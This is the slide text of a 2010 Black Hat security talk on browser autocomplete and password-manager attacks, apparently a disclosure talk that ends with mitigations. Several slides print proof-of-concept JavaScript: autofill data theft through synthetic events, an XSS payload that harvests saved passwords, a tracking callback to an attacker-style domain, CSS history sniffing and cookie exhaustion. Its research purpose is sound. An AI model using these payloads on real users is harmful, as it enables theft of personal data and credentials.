Successfully reported this slideshow.
Your SlideShare is downloading. ×

Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

Download to read offline

Did you know a malicious website, laced with javascript malware, can steal passwords for other websites stored in Firefox’s password manager using nothing but garden variety Cross-Site Scripting? How about javascript’s ability to mine out HTML form auto-complete data in Internet Explorer 6 and 7 (about one-third of the Web), which could be used to reveal a users first name, last name, aliases, email addresses, physical address, etc? What about forcing Web browsers to evict all of their cookies—thereby automatically logging users out of all their current sessions, delete tracking cookies, and so on?

Technically speaking, all of these Web hacking techniques and others are publicly documented, only just not very well-known or advertised. For whatever reason they've been ignored by the browser vendors and Web security researchers. Time to bring them up to the surface.

Did you know a malicious website, laced with javascript malware, can steal passwords for other websites stored in Firefox’s password manager using nothing but garden variety Cross-Site Scripting? How about javascript’s ability to mine out HTML form auto-complete data in Internet Explorer 6 and 7 (about one-third of the Web), which could be used to reveal a users first name, last name, aliases, email addresses, physical address, etc? What about forcing Web browsers to evict all of their cookies—thereby automatically logging users out of all their current sessions, delete tracking cookies, and so on?

Technically speaking, all of these Web hacking techniques and others are publicly documented, only just not very well-known or advertised. For whatever reason they've been ignored by the browser vendors and Web security researchers. Time to bring them up to the surface.

More Related Content

Breaking Browsers: Hacking Auto-Complete (BlackHat USA 2010)

  1. 1. Breaking Browsers: Hacking Auto-Complete Jeremiah Grossman Founder & Chief Technology Officer Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com special thanks to: Robert “RSnake” Hansen (SecTheory) Daniel Veditz (Mozilla) Microsoft Security Response Center Mike Bailey (MAD Security) Chris Evans (Google)
  2. 2. • WhiteHat Security Founder & Chief Technology Officer • 2010 RSA Security Bloggers Award (Best Corporate Blog) • InfoWorld's CTO Top 25 (2007) • 5th most popular “Jeremiah” according to Google • Brazilian Jiu-Jitsu Brown Belt • Narcissistic Vulnerability Pimp • Former Yahoo! information security officer me. © 2010 WhiteHat Security, Inc. | Page 2
  3. 3. Web Security Website Security Browser Security 2,000+ websites © 2010 WhiteHat Security, Inc. | Page 3
  4. 4. Global Internet: 1.67 Billion People Internet 206 million websites 1.67 billion people http://en.wikipedia.org/wiki/Global_Internet_usage © 2010 WhiteHat Security, Inc. | Page 4
  5. 5. What the “bad guys” target... Largest Market-share Exploiting Features Enabled by Default Bonus for Design Flaws © 2010 WhiteHat Security, Inc. | Page 5
  6. 6. Browser Version Market Share July, 2010 http://www.netmarketshare.com/browser-market-share.aspx?qprid=2 © 2010 WhiteHat Security, Inc. | Page 6
  7. 7. By the numbers, of people IE 8 IE 6 FF 3.5/3.6 IE 7 Chrome Safari 4/5 491 284 351 197 103 83 Million Million Million Million Million Million 307 Mil 36 Mil © 2010 WhiteHat Security, Inc. | Page 7
  8. 8. Security Features Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc. © 2010 WhiteHat Security, Inc. | Page 8
  9. 9. I know where you’ve been... (on the way out) a:visited#link { Classic CSS background: url('/capture.cgi?http://bank/'); } History Hack Visited In the “visited” pseudo-class, everything except color style properties are ignored. Unvisited var color = document.defaultView.getComputedStyle (link,null).getPropertyValue("color"); getComputedStyle lies and returns the “unvisited” link values. FF 3.7 Safari v5 Nightlies http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/ http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html © 2010 WhiteHat Security, Inc. | Page 9
  10. 10. We often still know where you are logged-in, but that’s another discussion. CSRF Login-Detection © 2010 WhiteHat Security, Inc. | Page 10
  11. 11. I want to know your name, who you work for, where you live, your email address, etc. Right at the moment you a visit a website. Even if you’ve never been there before, let alone entered information. © 2010 WhiteHat Security, Inc. | Page 11
  12. 12. © 2010 WhiteHat Security, Inc. | Page 12
  13. 13. Safari Address Book Autofill (enabled by default) <form> <input type="text" name="name"> <input type="text" name="company"> <input type="text" name="city"> <input type="text" name="state"> <input type="text" name="country"> <input type="text" name="email"> </form> © 2010 WhiteHat Security, Inc. | Page 13
  14. 14. Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE. © 2010 WhiteHat Security, Inc. | Page 14
  15. 15. DEMO var event = document.createEvent('TextEvent'); event.initTextEvent('textInput', 1, 1, null, char); input.value = ""; Step 1) Dynamically create input.selectionStart = 0; input fields with the pre-set input.selectionEnd = 0; attribute names. input.focus(); input.dispatchEvent(event);! Step 2) Cycle through the ! alphabet initiating text events setTimeout(function() { until a form value populates. if (input.value.length > 1) { // capture the value; Step 3) Profit! -- Steal data } with JavaScript. }, 500); *transparency is even more fun!* Safari v4 / v5 © 2010 WhiteHat Security, Inc. | Page 15
  16. 16. What about stealing other auto-fill data, data that was previously entered? © 2010 WhiteHat Security, Inc. | Page 16
  17. 17. Internet Explorer 8 = SAFE © 2010 WhiteHat Security, Inc. | Page 17
  18. 18. AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc. <input type="text" name="email"> © 2010 WhiteHat Security, Inc. | Page 18
  19. 19. DEMO - Down, Down, Enter // hit down arrow an incrementing number of times. // separate with time to allow the GUI to keep pace for (var i = 1; i <= downs; i++) { time += 30; // time padding keyStroke(this, 40, time); // down button } ! ! time += 15; // time padding keyStroke(this, 13, time); // enter button // initiate keystroke on a given object function keyStroke(obj, code, t) { //create new event and fire var e = document.createEventObject(); e.keyCode = code; setTimeout(function() {obj.fireEvent("onkeydown", e); }, t); } // end keyStroke Security Basis, and an Internet Explorer data stealer http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html Andrea Giammarchi, Ajaxian Staff © 2010 WhiteHat Security, Inc. | Page 19
  20. 20. Search terms Credit card numbers and CCVs Aliases Contact information Answers to secret questions Usernames Email addresses ... © 2010 WhiteHat Security, Inc. | Page 20
  21. 21. AutoComplete is NOT enabled by default, but Internet Explorer asks if the user if they would like to enable the feature after filling out a non-password form. © 2010 WhiteHat Security, Inc. | Page 21
  22. 22. Sometimes we can’t read auto-complete, but we can write to it (a lot)! <script> function fillAutoComp() { var num = Math.floor(Math.random()*1000000); document.getElementById('email').value = “Spoof-” + num; setTimeout("document.getElementById('me').submit(); fillAutoComp();",2); } </script> <form id=”me” method="post" action="/" target="my_iframe"> <input type="text" name="email" id="email" value="" size=140> <input type="button" onclick="fillAutoComp()" value="Start"> </form> <iframe name="my_iframe"></iframe> https://bugzilla.mozilla.org/show_bug.cgi?id=578879 * * © 2010 WhiteHat Security, Inc. | Page 22
  23. 23. Have the email address, but need the password © 2010 WhiteHat Security, Inc. | Page 23
  24. 24. Remember Password Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis. <form method="post" action="/"> E-Mail: <input type="text" name="email"><br /> Password: <input type="password" name="pass"><br /> <input type="submit" value="Login"> </form> © 2010 WhiteHat Security, Inc. | Page 24
  25. 25. If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which executes the browser’s password auto-complete feature. Since the payload is on the same domain the username / password can be stolen. function stealCreds() { var string = "E-Mail: " + document.getElementById("u").value; string += "nPassword: " + document.getElementById("p").value; return string; } document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>'); setTimeout('alert(stealCreds())', 2000); * * DEMO © 2010 WhiteHat Security, Inc. | Page 25
  26. 26. Hidden Firefox Protection about:config signon.autofillForms © 2010 WhiteHat Security, Inc. | Page 26
  27. 27. Long-term problem, even when “fixed” Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and setup a callback Web service. DOMAIN: website DOMAIN: whoisthisperson <script> var person = { function identify (person) { name: ‘name’, ... email: ‘name’, } } </script> identify(person); <script src=”http:// iknowyourname.com/?cb=identify”> © 2010 WhiteHat Security, Inc. | Page 27
  28. 28. Need help deleting your cookies? the users way... 28 © 2010 WhiteHat Security, Inc. | Page
  29. 29. The Hackers Way - (Cookie Exhaustion) Firefox: Global 3,000 cookie max cap. 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains. <script> for (var i = 1; i <= 60; i++) { img = new Image(); img = "http://the" + i + ".cookiemonster.com/cgi-bin/cookie.pl"; } </script> P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"; Set-Cookie: cNAME_1=_cValue_1; Set-Cookie: cNAME_2=_cValue_2; Set-Cookie: cNAME_3=_cValue_3; ... https://bugzilla.mozilla.org/show_bug.cgi?id=321624 http://kuza55.blogspot.com/2008/02/understanding-cookie-security.html http://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/ © 2010 WhiteHat Security, Inc. | Page 29
  30. 30. $300 dollar hack © 2010 WhiteHat Security, Inc. | Page 30
  31. 31. What to do... Disable Auto-Complete in the Web browser Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.) NoScript (Firefox Extension), 1Password, etc. <form autocomplete="off"> <input type="text" autocomplete="off" /> © 2010 WhiteHat Security, Inc. | Page 31
  32. 32. Questions? Jeremiah Grossman Founder & Chief Technology Officer Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com © 2010 WhiteHat Security, Inc. | Page 32

×